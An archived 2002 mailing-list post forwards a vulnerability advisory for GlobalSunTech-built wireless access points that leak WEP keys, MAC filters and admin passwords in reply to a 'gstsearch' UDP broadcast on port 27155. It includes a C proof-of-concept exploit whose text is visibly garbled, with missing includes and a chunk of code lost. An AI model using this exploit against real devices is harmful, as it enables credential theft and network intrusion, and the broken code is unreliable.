CRIME Another AP hack.

From: brvarin@private
Date: Wed Nov 06 2002 - 07:31:38 PST

  • Next message: George Heuston: "CRIME FW: [Cyber_threats] Daily News 11/06/02"

    Reason #43567 to not allow wireless in the corporate environment. Send a
    UDP packet to the AP and it gives up WEP keys, mac filters, and admin
    password. It only affects the best selling AP's!
    
    GlobalSunTech develops Wireless Access Points for OEM customers like
    Linksys, D-Link and others. Capturing the traffic of a WISECOM GL2422AP-0T
    during the setup phase showed a security problem.
    
    Sending a broadcast packet to UDP port 27155 containing the string
    "gstsearch" causes the accesspoint to return wep keys, mac filter and
    admin password. This happens on the WLAN Side and on the LAN Side.
    
    Systems Affected
    ----------------
    Vulnerable, tested, OEM Version from GlobalSunTech:
    WISECOM GL2422AP-0T
    
    Possibly vulnerable, not tested, OEM Version from GlobalSunTech:
    D-Link DWL-900AP+ B1 version 2.1 and 2.2
    ALLOY GL-2422AP-S
    EUSSO GL2422-AP
    LINKSYS WAP11-V2.2
    
    
    Proof of concept:
    -----------------
    
    #include
    #include
    #include
    #include
    #include
    
    typedef struct {
    char type[28];
    char name[32];
    char user[16];
    char pass[16];
    }
    __attribute__ ((packed)) answer;
    
    int main()
    {
    char rcvbuffer[1024];
    struct sockaddr_in sin;
    answer* ans = (answer *)rcvbuffer;
    int sd, ret, val;
    
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = inet_addr("255.255.255.255");
    sin.sin_port = htons(27155);
    
    sd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sd type);
    printf("Announced Name : %sn",ans->name);
    printf("Admin Username : %sn",ans->user);
    printf("Admin Password : %sn",ans->pass);
    
    return 0;
    }
    
    Disclaimer
    -----------
    
    This advisory does not claim to be complete or to be usable for
    any purpose. Especially information on the vulnerable systems
    may
    be inaccurate or wrong. Possibly supplied exploit code is not to
    be used for malicious purposes, but for educational purposes
    only.
    This advisory is free for open distribution in unmodified form.
    
    http://www.khamsin.ch
    
    ===========================================================================
    IMPORTANT NOTICE: This communication, including any attachment, contains
    information that may be confidential or privileged, and is intended solely
    for the entity or individual to whom it is addressed.  If you are not the
    intended recipient, you should delete this message and are hereby notified
    that any disclosure, copying, or distribution of this message is strictly
    prohibited.  Nothing in this email, including any attachment, is intended
    to be a legally binding signature.
    



    This archive was generated by hypermail 2b30 : Wed Nov 06 2002 - 08:32:07 PST